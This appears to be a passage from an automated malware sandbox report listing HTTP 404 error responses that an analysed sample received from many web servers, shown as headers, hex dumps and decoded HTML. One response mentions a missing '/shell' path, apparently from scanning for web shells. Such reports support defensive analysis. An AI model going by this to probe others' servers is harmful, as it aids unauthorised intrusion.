70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:34 GMTServer: Apache/2.4.48 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Mon, 01 Nov 2021 09:09:37 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 04:09:37 GMTX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockContent-Length: 181Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=8, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /shell</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:38 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 06:09:37 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:09:38 GMTContent-Length: 3257Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:09:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:41 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2s-freebsd PHP/5.6.30 mod_perl/2.0.11 Perl/v5.32.0Content-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:41 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiDate: Mon, 01 Nov 2021 09:09:41 GMTServer: Microsoft-HTTPAPI/2.0Content-Length: 315Connection: CloseData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:45 GMTServer: ApacheLast-Modified: Wed, 09 Jan 2019 14:14:03 GMTETag: "70e-57f0712ff7ff5"Accept-Ranges: bytesContent-Length: 1806Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 34 34 34 34 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 45 45 45 45 45 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 54 72 65 62 75 63 68 65 74 20 4d 53 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 68 31 20 7b 7d 0a 20 20 20 20 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 65 6d 3b 20 7d 0a 20 20 20 20 23 70 61 67 65 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 34 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 2e 73 74
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:09:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 